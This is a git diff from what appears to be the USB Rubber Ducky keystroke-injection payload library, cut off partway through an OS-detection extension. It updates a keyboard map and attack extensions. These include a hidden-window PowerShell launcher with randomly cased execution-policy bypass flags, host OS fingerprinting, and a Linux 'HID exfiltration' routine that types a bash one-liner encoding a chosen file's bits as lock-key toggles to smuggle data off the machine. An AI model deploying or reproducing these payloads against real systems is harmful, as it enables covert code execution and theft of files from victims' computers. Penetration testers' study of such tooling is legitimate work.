Merge branch 'hak5:master' into master
commit
3f6415327d
|
@ -99,6 +99,7 @@
|
||||||
"DOWNARROW":"00,00,51",
|
"DOWNARROW":"00,00,51",
|
||||||
"UP":"00,00,52",
|
"UP":"00,00,52",
|
||||||
"UPARROW":"00,00,52",
|
"UPARROW":"00,00,52",
|
||||||
|
"NUMLOCK":"00,00,53",
|
||||||
"<":"00,00,64",
|
"<":"00,00,64",
|
||||||
"APP":"00,00,65",
|
"APP":"00,00,65",
|
||||||
"MENU":"00,00,65",
|
"MENU":"00,00,65",
|
||||||
|
|
|
@ -56,6 +56,7 @@
|
||||||
"ENTER":"00,00,28",
|
"ENTER":"00,00,28",
|
||||||
"ESC":"00,00,29",
|
"ESC":"00,00,29",
|
||||||
"ESCAPE":"00,00,29",
|
"ESCAPE":"00,00,29",
|
||||||
|
"BACKSPACE":"00,00,2a",
|
||||||
"TAB":"00,00,2b",
|
"TAB":"00,00,2b",
|
||||||
" ":"00,00,2c",
|
" ":"00,00,2c",
|
||||||
"SPACE":"00,00,2c",
|
"SPACE":"00,00,2c",
|
||||||
|
@ -102,10 +103,26 @@
|
||||||
"DOWNARROW":"00,00,51",
|
"DOWNARROW":"00,00,51",
|
||||||
"UP":"00,00,52",
|
"UP":"00,00,52",
|
||||||
"UPARROW":"00,00,52",
|
"UPARROW":"00,00,52",
|
||||||
|
"NUMLOCK":"00,00,53",
|
||||||
|
"KPAD_SLASH":"00,00,54",
|
||||||
|
"KPAD_ASTERISK":"00,00,55",
|
||||||
|
"KPAD_MINUS":"00,00,56",
|
||||||
|
"KPAD_PLUS":"00,00,57",
|
||||||
|
"KPAD_ENTER":"00,00,58",
|
||||||
|
"KPAD_1":"00,00,59",
|
||||||
|
"KPAD_2":"00,00,5a",
|
||||||
|
"KPAD_3":"00,00,5b",
|
||||||
|
"KPAD_4":"00,00,5c",
|
||||||
|
"KPAD_5":"00,00,5d",
|
||||||
|
"KPAD_6":"00,00,5e",
|
||||||
|
"KPAD_7":"00,00,5f",
|
||||||
|
"KPAD_8":"00,00,60",
|
||||||
|
"KPAD_9":"00,00,61",
|
||||||
|
"KPAD_0":"00,00,62",
|
||||||
|
"KPAD_DOT":"00,00,63",
|
||||||
"\\":"00,00,64",
|
"\\":"00,00,64",
|
||||||
"APP":"00,00,65",
|
"APP":"00,00,65",
|
||||||
"MENU":"00,00,65",
|
"MENU":"00,00,65",
|
||||||
"ALT-TAB":"00,00,71",
|
|
||||||
"CONTROL":"01,00,00",
|
"CONTROL":"01,00,00",
|
||||||
"CTRL":"01,00,00",
|
"CTRL":"01,00,00",
|
||||||
"SHIFT":"02,00,00",
|
"SHIFT":"02,00,00",
|
||||||
|
@ -137,6 +154,7 @@
|
||||||
"Z":"02,00,1d",
|
"Z":"02,00,1d",
|
||||||
"!":"02,00,1e",
|
"!":"02,00,1e",
|
||||||
"\"":"02,00,1f",
|
"\"":"02,00,1f",
|
||||||
|
"£":"02,00,20",
|
||||||
"$":"02,00,21",
|
"$":"02,00,21",
|
||||||
"%":"02,00,22",
|
"%":"02,00,22",
|
||||||
"^":"02,00,23",
|
"^":"02,00,23",
|
||||||
|
@ -151,19 +169,26 @@
|
||||||
"~":"02,00,31",
|
"~":"02,00,31",
|
||||||
":":"02,00,33",
|
":":"02,00,33",
|
||||||
"@":"02,00,34",
|
"@":"02,00,34",
|
||||||
|
"¬":"02,00,35",
|
||||||
"<":"02,00,36",
|
"<":"02,00,36",
|
||||||
">":"02,00,37",
|
">":"02,00,37",
|
||||||
"?":"02,00,38",
|
"?":"02,00,38",
|
||||||
"|":"02,00,64",
|
"|":"02,00,64",
|
||||||
"CTRL-SHIFT":"03,00,00",
|
"CTRL-SHIFT":"03,00,00",
|
||||||
"ALT":"04,00,00",
|
"ALT":"04,00,00",
|
||||||
|
"ALT-TAB":"04,00,2b",
|
||||||
"CTRL-ALT":"05,00,00",
|
"CTRL-ALT":"05,00,00",
|
||||||
"ALT-SHIFT":"06,00,00",
|
"ALT-SHIFT":"06,00,00",
|
||||||
"COMMAND":"08,00,00",
|
|
||||||
"GUI":"08,00,00",
|
"GUI":"08,00,00",
|
||||||
"WINDOWS":"08,00,00",
|
"WINDOWS":"08,00,00",
|
||||||
"COMMAND-OPTION":"12,00,00",
|
"COMMAND":"08,00,00",
|
||||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
"COMMAND-CTRL":"09,00,00",
|
||||||
"COMMAND-CTRL":"12,00,00",
|
"COMMAND-CTRL-SHIFT":"0b,00,00",
|
||||||
"COMMAND-OPTION-SHIFT'":"12,00,00"
|
"COMMAND-OPTION":"0c,00,00",
|
||||||
|
"COMMAND-OPTION-SHIFT'":"0e,00,00",
|
||||||
|
"ALTGR":"40,00,00",
|
||||||
|
"ALTGR-TAB":"40,00,2b",
|
||||||
|
"¦":"40,00,35",
|
||||||
|
"CTRL-ALTGR":"41,00,00",
|
||||||
|
"ALTGR-SHIFT":"42,00,00"
|
||||||
}
|
}
|
|
@ -51,7 +51,8 @@ EXTENSION Rolling_Powershell_Execution
|
||||||
STRING powershell.exe -noP -nOnI -windo H
|
STRING powershell.exe -noP -nOnI -windo H
|
||||||
END_IF
|
END_IF
|
||||||
|
|
||||||
IF_DEFINED #EXECUTIONPOLICY
|
|
||||||
|
IF_DEFINED_TRUE #EXECUTIONPOLICY
|
||||||
SPACE
|
SPACE
|
||||||
IF (($RANDOM_PS % 2) == 0) THEN
|
IF (($RANDOM_PS % 2) == 0) THEN
|
||||||
STRING -ep ByPasS
|
STRING -ep ByPasS
|
||||||
|
|
|
@ -1,23 +1,26 @@
|
||||||
EXTENSION DETECT_READY
|
EXTENSION DETECT_READY
|
||||||
REM VERSION 1.0
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
REM USAGE:
|
REM_BLOCK DOCUMENTATION
|
||||||
REM Extension runs inline (here)
|
USAGE:
|
||||||
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
Extension runs inline (here)
|
||||||
REM boot delay
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
REM TARGETS:
|
TARGETS:
|
||||||
REM Any system that reflects CAPSLOCK will detect minimum required delay
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM CONFIGURATION:
|
REM CONFIGURATION:
|
||||||
DEFINE RESPONSE_DELAY 25
|
DEFINE #RESPONSE_DELAY 25
|
||||||
DEFINE ITERATION_LIMIT 120
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
VAR $C = 0
|
VAR $C = 0
|
||||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
CAPSLOCK
|
CAPSLOCK
|
||||||
DELAY RESPONSE_DELAY
|
DELAY #RESPONSE_DELAY
|
||||||
$C = ($C + 1)
|
$C = ($C + 1)
|
||||||
END_WHILE
|
END_WHILE
|
||||||
CAPSLOCK
|
CAPSLOCK
|
||||||
|
|
|
@ -1,18 +1,24 @@
|
||||||
EXTENSION EXFIL_AUTO_EOF_DETECT
|
EXTENSION EXFIL_AUTO_EOF_DETECT
|
||||||
REM VERSION 1.0
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
REM USAGE:
|
REM_BLOCK DOCUMENTATION
|
||||||
REM Call WAIT_FOR_EOF() after starting Keystroke Reflection / HID Exfil
|
USAGE:
|
||||||
|
Call WAIT_FOR_EOF() after starting Keystroke Reflection / HID Exfil
|
||||||
|
|
||||||
REM TARGETS:
|
TARGETS:
|
||||||
REM Any; intended for use on systems that dont reflect more than 2 lock keys
|
Requires reflection of at least 2 lock keys.
|
||||||
|
Intended for use on systems that dont reflect more than 2 lock keys.
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION
|
||||||
|
DEFINE #INACTIVTY_TARGET 10
|
||||||
|
|
||||||
FUNCTION WAIT_FOR_EOF()
|
FUNCTION WAIT_FOR_EOF()
|
||||||
VAR $CURRENT_CAPSLOCK_STATE = $_CAPSLOCK_ON
|
VAR $CURRENT_CAPSLOCK_STATE = $_CAPSLOCK_ON
|
||||||
VAR $CURRENT_NUMLOCK_STATE = $_NUMLOCK_ON
|
VAR $CURRENT_NUMLOCK_STATE = $_NUMLOCK_ON
|
||||||
VAR $PROCESSING = TRUE
|
VAR $PROCESSING = TRUE
|
||||||
VAR $INACTIVITY_COUNT = 0
|
VAR $INACTIVITY_COUNT = 0
|
||||||
DEFINE INACTIVTY_TARGET 10
|
|
||||||
WHILE ($PROCESSING)
|
WHILE ($PROCESSING)
|
||||||
DELAY 20
|
DELAY 20
|
||||||
IF($CURRENT_CAPSLOCK_STATE != $_CAPSLOCK_ON) THEN
|
IF($CURRENT_CAPSLOCK_STATE != $_CAPSLOCK_ON) THEN
|
||||||
|
@ -25,7 +31,7 @@ EXTENSION EXFIL_AUTO_EOF_DETECT
|
||||||
LED_R
|
LED_R
|
||||||
ELSE
|
ELSE
|
||||||
$INACTIVTY_COUNT = ($INACTIVTY_COUNT + 1)
|
$INACTIVTY_COUNT = ($INACTIVTY_COUNT + 1)
|
||||||
IF ($INACTIVTY_COUNT >= INACTIVTY_TARGET) THEN
|
IF ($INACTIVTY_COUNT >= #INACTIVTY_TARGET) THEN
|
||||||
$PROCESSING = FALSE
|
$PROCESSING = FALSE
|
||||||
END_IF
|
END_IF
|
||||||
LED_OFF
|
LED_OFF
|
||||||
|
|
|
@ -1,13 +1,17 @@
|
||||||
EXTENSION HELLO_OS
|
EXTENSION HELLO_OS
|
||||||
REM VERSION 1.0
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
REM USAGE:
|
REM_BLOCK DOCUMENTATION
|
||||||
REM For use with OS_DETECT Extension, call HELLO_OS() after DETECT_OS()
|
USAGE:
|
||||||
REM prints the OS determination
|
For use with OS_DETECT Extension, call HELLO_OS() after DETECT_OS()
|
||||||
|
prints the OS determination
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Additional Example: Defining custom $_OS enums
|
REM Additional Example: Defining custom $_OS enums
|
||||||
DEFINE SOME_OTHER_OS 6
|
DEFINE #EXTRA_EXAMPLES FALSE
|
||||||
DEFINE ANOTHER_OS 7
|
DEFINE #SOME_OTHER_OS 6
|
||||||
|
DEFINE #ANOTHER_OS 7
|
||||||
|
|
||||||
FUNCTION HELLO_OS()
|
FUNCTION HELLO_OS()
|
||||||
IF ($_OS == WINDOWS) THEN
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
@ -22,12 +26,14 @@ EXTENSION HELLO_OS
|
||||||
STRING Hello ChromeOS!
|
STRING Hello ChromeOS!
|
||||||
ELSE IF ($_OS == ANDROID) THEN
|
ELSE IF ($_OS == ANDROID) THEN
|
||||||
STRING Hello Android!
|
STRING Hello Android!
|
||||||
ELSE IF($_OS == SOME_OTHER_OS) THEN
|
IF_DEFINED_TRUE #EXTRA_EXAMPLES
|
||||||
|
ELSE IF($_OS == #SOME_OTHER_OS) THEN
|
||||||
REM Example Only
|
REM Example Only
|
||||||
STRING HELLO Custom OS Type!
|
STRING HELLO Custom OS Type!
|
||||||
ELSE IF($_OS == ANOTHER_OS) THEN
|
ELSE IF($_OS == #ANOTHER_OS) THEN
|
||||||
REM Example Only
|
REM Example Only
|
||||||
STRING HELLO Another Custom OS Type!
|
STRING HELLO Another Custom OS Type!
|
||||||
|
END_IF_DEFINED
|
||||||
ELSE
|
ELSE
|
||||||
STRING Hello World!
|
STRING Hello World!
|
||||||
END_IF
|
END_IF
|
||||||
|
|
|
@ -1,44 +1,94 @@
|
||||||
EXTENSION LINUX_HID_EXFIL
|
EXTENSION LINUX_HID_EXFIL
|
||||||
REM VERSION 1.0
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
REM REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION
|
REM REQUIRES EXTENSION EXFIL_AUTO_EOF_DETECT
|
||||||
|
|
||||||
REM Helpers for Linux Keystroke Reflection data exfiltration
|
REM_BLOCK DOCUMENTATION
|
||||||
REM This payload is a proof of concept for USB HID only Data Exfiltration
|
Helpers for Linux Keystroke Reflection data exfiltration
|
||||||
|
This payload is a proof of concept for USB HID only Data Exfiltration
|
||||||
|
|
||||||
REM TARGET:
|
TARGET:
|
||||||
REM Linux Host that supports opening terminal via CTRL ALT t, and xdotool
|
Linux host that supports opening terminal via CTRL ALT t, and xdotool
|
||||||
|
|
||||||
REM USAGE:
|
USAGE:
|
||||||
REM Uncomment the function call below to run this extension inline
|
REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION
|
||||||
REM or call RUN_LINUX_EXFIL() anywhere in your payload after the extension
|
Prepare data to exfil (in filename defined by TARGET_FILE below)
|
||||||
|
with a terminal window already open - call RUN_LINUX_EXFIL()
|
||||||
|
|
||||||
REM DEPLOYMENT:
|
DEPLOYMENT:
|
||||||
REM Plug Ducky into host, wait for the LED to turn (and stay) solid Green.
|
Plug Ducky into host, wait for the LED to turn (and stay) solid Green.
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM CONFIGURATION:
|
REM CONFIGURATION:
|
||||||
REM File on host machine to exfil using Keystroke Reflection attack
|
REM File on host machine to exfil using Keystroke Reflection attack
|
||||||
DEFINE TARGET_FILE t.txt
|
DEFINE #TARGET_FILE filename.txt
|
||||||
DEFINE TERMINAL_OPEN_DELAY 500
|
|
||||||
DEFINE READY_TO_TYPE_DELAY 250
|
DEFINE #SAVE_AND_RESTORE_LOCKS TRUE
|
||||||
|
DEFINE #ENABLE_EXFIL_LEDS TRUE
|
||||||
|
DEFINE #CLOSE_TERMINAL_AFTER_EXFIL TRUE
|
||||||
|
|
||||||
|
REM if TRUE will open terminal, prepare data in #TARGET_FILE, and RUN_LINUX_EXFIL()
|
||||||
|
DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE
|
||||||
|
|
||||||
FUNCTION RUN_LINUX_EXFIL()
|
FUNCTION RUN_LINUX_EXFIL()
|
||||||
|
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
|
||||||
LED_OFF
|
LED_OFF
|
||||||
DELAY READY_TO_TYPE_DELAY
|
|
||||||
CTRL ALT t
|
|
||||||
DELAY TERMINAL_OPEN_DELAY
|
|
||||||
SAVE_HOST_KEYBOARD_LOCK_STATE
|
|
||||||
$_EXFIL_MODE_ENABLED = TRUE
|
|
||||||
$_EXFIL_LEDS_ENABLED = TRUE
|
$_EXFIL_LEDS_ENABLED = TRUE
|
||||||
STRINGLN uname -a > TARGET_FILE
|
END_IF_DEFINED
|
||||||
STRINGLN c="xdotool key --delay 4";o=" Caps_Lock";l=" Num_Lock";bs=$(xxd -b TARGET_FILE |cut -d " " -f2-7);for (( i=0;i<${#bs};i++ ));do b="${bs:$i:1}";if [[ "$b" == "0" ]];then c+=$o;fi;if [[ "$b" == "1" ]];then c+=$l;fi;done;eval "$c";exit
|
|
||||||
|
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
|
||||||
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
END_IF_DEFINED
|
||||||
|
|
||||||
|
$_EXFIL_MODE_ENABLED = TRUE
|
||||||
|
STRING_BASH
|
||||||
|
c="xdotool key --delay 4";
|
||||||
|
bs=$(xxd -b
|
||||||
|
#TARGET_FILE
|
||||||
|
|cut -d" " -f2-7);
|
||||||
|
for((i=0;i<${#bs};i++));do
|
||||||
|
b="${bs:$i:1}";
|
||||||
|
if [[ "$b" == "0" ]];then
|
||||||
|
c+=" Caps_Lock";
|
||||||
|
fi;
|
||||||
|
if [[ "$b" == "1" ]];then
|
||||||
|
c+=" Num_Lock";
|
||||||
|
fi;
|
||||||
|
done;
|
||||||
|
$c;
|
||||||
|
END_STRING
|
||||||
|
|
||||||
|
IF_DEFINED_TRUE #CLOSE_TERMINAL_AFTER_EXFIL
|
||||||
|
STRING exit;
|
||||||
|
END_IF_DEFINED
|
||||||
|
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM Requires adding EXFIL_AUTO_EOF_DETECT EXTENSION above this one
|
||||||
WAIT_FOR_EOF()
|
WAIT_FOR_EOF()
|
||||||
$_EXFIL_LEDS_ENABLED = FALSE
|
|
||||||
$_EXFIL_MODE_ENABLED = FALSE
|
$_EXFIL_MODE_ENABLED = FALSE
|
||||||
|
|
||||||
|
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
|
||||||
|
$_EXFIL_LEDS_ENABLED = FALSE
|
||||||
|
END_IF_DEFINED
|
||||||
|
|
||||||
|
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
|
||||||
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
END_IF_DEFINED
|
||||||
END_FUNCTION
|
END_FUNCTION
|
||||||
|
|
||||||
REM Uncomment the function call below to run this extension inline (here)
|
IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO
|
||||||
REM or call RUN_WINDOWS_EXFIL() anywhere in your payload after the extension
|
REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template.
|
||||||
|
REM DEMO Boot Delay
|
||||||
REM RUN_LINUX_EXFIL()
|
DELAY 3000
|
||||||
|
REM Open Terminal
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 500
|
||||||
|
REM Perpare some data in TARGET_FILE
|
||||||
|
STRINGLN uname -a>#TARGET_FILE
|
||||||
|
REM Exfil data to USB Rubber Ducky using Keystroke Reflection
|
||||||
|
RUN_LINUX_EXFIL()
|
||||||
|
END_IF_DEFINED
|
||||||
END_EXTENSION
|
END_EXTENSION
|
||||||
|
|
|
@ -1,202 +1,217 @@
|
||||||
EXTENSION OS_DETECTION
|
EXTENSION OS_DETECTION
|
||||||
REM VERSION 1.0
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
REM USB Rubber Ducky Host OS Detection
|
REM_BLOCK DOCUMENTATION
|
||||||
REM Generic OS detection at a high view is a moving target
|
USB Rubber Ducky Host OS Detection
|
||||||
REM results may vary greatly depending
|
Generic OS detection at a high view is a moving target
|
||||||
REM on a combination of many variables:
|
results may vary greatly depending
|
||||||
REM - number of testing stages
|
on a combination of many variables:
|
||||||
REM - specific devices and versions tested against
|
- number of testing stages
|
||||||
REM - number of systems testing for (scope)
|
- specific devices and versions tested against
|
||||||
REM - detection techniques (passive/invisible/active/hybrid)
|
- number of systems testing for (scope)
|
||||||
REM - overall speed
|
- detection techniques (passive/invisible/active/hybrid)
|
||||||
REM - overall accuracy
|
- overall speed
|
||||||
|
- overall accuracy
|
||||||
|
|
||||||
REM TARGET:
|
If all you require is windows vs <anything other os> detection, the
|
||||||
REM DEFAULT - Windows, Mac, Linux
|
PASSIVE_WINDOWS_DETECT extension is recommended over this extension.
|
||||||
REM ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android
|
|
||||||
|
|
||||||
REM USAGE:
|
TARGET:
|
||||||
REM Uncomment the function call below to run this extension inline (here)
|
DEFAULT - Windows, Mac, Linux
|
||||||
REM or call DETECT_OS() anywhere in your payload after the extension
|
ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android
|
||||||
REM Place this extension and the DETECT_OS() before
|
|
||||||
REM you would like to first reference $_OS to execute payload code conditionally
|
USAGE:
|
||||||
|
Uncomment the function call below to run this extension inline (here)
|
||||||
|
or call DETECT_OS() anywhere in your payload after the extension
|
||||||
|
Place this extension and the DETECT_OS() before
|
||||||
|
you would like to first reference $_OS to execute payload code conditionally
|
||||||
|
|
||||||
|
FEEDBACK:
|
||||||
|
As mentioned above, this a moving target (especially for mac systems)
|
||||||
|
Please report any issues identifying specific operating systems.
|
||||||
|
Your feedback will greatly help solidify the robustness of this extension
|
||||||
|
|
||||||
|
DEBUGGING:
|
||||||
|
SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM CONFIGURATION:
|
REM CONFIGURATION:
|
||||||
DEFINE VERBOSE FALSE
|
REM For Debugging:
|
||||||
DEFINE ADVANCED_DETECTION FALSE
|
DEFINE #DEBUGGING_OUTPUT FALSE
|
||||||
DEFINE STARTUP_DELAY 1500
|
DEFINE #ADVANCED_DETECTION FALSE
|
||||||
DEFINE RESTART_WAIT 1000
|
REM Timing fine tuning:
|
||||||
DEFINE CONNECT_WAIT 1000
|
DEFINE #STARTUP_DELAY 1500
|
||||||
DEFINE OS_DETECT_MODE HID
|
DEFINE #RESTART_WAIT 1000
|
||||||
DEFINE OS_DETECT_VID VID_05AC
|
DEFINE #CONNECT_WAIT 1000
|
||||||
DEFINE OS_DETECT_PID PID_021E
|
DEFINE #OS_DETECT_MODE HID
|
||||||
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
|
DEFINE #OS_DETECT_VID VID_05AC
|
||||||
DEFINE HOST_RESPONSE_TIMEOUT 1000
|
DEFINE #OS_DETECT_PID PID_021E
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #HOST_RESPONSE_TIMEOUT 1000
|
||||||
|
|
||||||
FUNCTION DETECT_OS()
|
FUNCTION DETECT_OS()
|
||||||
$_HOST_CONFIGURATION_REQUEST_COUNT = 0
|
$_HOST_CONFIGURATION_REQUEST_COUNT = 0
|
||||||
ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID
|
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
|
||||||
DELAY STARTUP_DELAY
|
DELAY #STARTUP_DELAY
|
||||||
SAVE_HOST_KEYBOARD_LOCK_STATE
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
IF ADVANCED_DETECTION THEN
|
IF_DEFINED_TRUE #ADVANCED_DETECTION
|
||||||
STRING ADVANCED OS DETECT
|
STRING ADVANCED OS DETECT
|
||||||
ELSE
|
ELSE_DEFINED
|
||||||
STRING OS DETECT
|
STRING OS DETECT
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
|
|
||||||
ENTER
|
ENTER
|
||||||
STRING test caps
|
STRING test caps
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
|
|
||||||
IF ($_CAPSLOCK_ON == FALSE) THEN
|
IF ($_CAPSLOCK_ON == FALSE) THEN
|
||||||
LED_R
|
LED_R
|
||||||
CAPSLOCK
|
CAPSLOCK
|
||||||
DELAY HOST_RESPONSE_TIMEOUT
|
DELAY #HOST_RESPONSE_TIMEOUT
|
||||||
END_IF
|
END_IF
|
||||||
LED_OFF
|
LED_OFF
|
||||||
|
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING test done
|
STRING test done
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
|
|
||||||
IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
|
IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING received led response
|
STRING received led response
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
LED_G
|
LED_G
|
||||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING prediction: Windows
|
STRING prediction: Windows
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
$_OS = WINDOWS
|
$_OS = WINDOWS
|
||||||
ELSE
|
ELSE
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING prediction: Linux
|
STRING prediction: Linux
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
$_OS = LINUX
|
$_OS = LINUX
|
||||||
END_IF
|
END_IF
|
||||||
ELSE
|
ELSE
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING no led response
|
STRING no led response
|
||||||
ENTER
|
ENTER
|
||||||
STRING prediciton: MacOS
|
STRING prediciton: MacOS
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
$_OS = MACOS
|
$_OS = MACOS
|
||||||
END_IF
|
END_IF
|
||||||
|
|
||||||
IF ADVANCED_DETECTION THEN
|
IF_DEFINED_TRUE #ADVANCED_DETECTION
|
||||||
IF ( $_OS == LINUX ) THEN
|
IF ( $_OS == LINUX ) THEN
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING soft reconnect
|
STRING soft reconnect
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
ATTACKMODE OFF
|
ATTACKMODE OFF
|
||||||
DELAY RESTART_WAIT
|
DELAY #RESTART_WAIT
|
||||||
ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID
|
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
|
||||||
DELAY CONNECT_WAIT
|
DELAY #CONNECT_WAIT
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING reconnected
|
STRING reconnected
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
IF ($_CAPSLOCK_ON == TRUE) THEN
|
IF ($_CAPSLOCK_ON == TRUE) THEN
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING caps led on
|
STRING caps led on
|
||||||
ENTER
|
ENTER
|
||||||
STRING test numlock
|
STRING test numlock
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
NUMLOCK
|
NUMLOCK
|
||||||
DELAY HOST_RESPONSE_TIMEOUT
|
DELAY #HOST_RESPONSE_TIMEOUT
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING test done
|
STRING test done
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
IF ($_NUMLOCK_ON == FALSE) THEN
|
IF ($_NUMLOCK_ON == FALSE) THEN
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING no numlock led
|
STRING no numlock led
|
||||||
ENTER
|
ENTER
|
||||||
STRING prediciton: ChromeOS
|
STRING prediciton: ChromeOS
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
$_OS = CHROMEOS
|
$_OS = CHROMEOS
|
||||||
ELSE
|
ELSE
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING numlock led on
|
STRING numlock led on
|
||||||
ENTER
|
ENTER
|
||||||
STRING testing scrolllock
|
STRING testing scrolllock
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
SCROLLLOCK
|
SCROLLLOCK
|
||||||
DELAY HOST_RESPONSE_TIMEOUT
|
DELAY #HOST_RESPONSE_TIMEOUT
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING test done
|
STRING test done
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
IF ($_SCROLLLOCK_ON == TRUE) THEN
|
IF ($_SCROLLLOCK_ON == TRUE) THEN
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING scrolllock led on
|
STRING scrolllock led on
|
||||||
ENTER
|
ENTER
|
||||||
STRING prediciton: Android
|
STRING prediciton: Android
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
$_OS = ANDROID
|
$_OS = ANDROID
|
||||||
ELSE
|
ELSE
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING no scrolllock reply
|
STRING no scrolllock reply
|
||||||
ENTER
|
ENTER
|
||||||
STRING prediction: Linux
|
STRING prediction: Linux
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
$_OS = LINUX
|
$_OS = LINUX
|
||||||
END_IF
|
END_IF
|
||||||
END_IF
|
END_IF
|
||||||
END_IF
|
END_IF
|
||||||
ELSE IF ($_OS == MACOS) THEN
|
ELSE IF ($_OS == MACOS) THEN
|
||||||
IF ($_CAPSLOCK_ON == TRUE) THEN
|
IF ($_CAPSLOCK_ON == TRUE) THEN
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
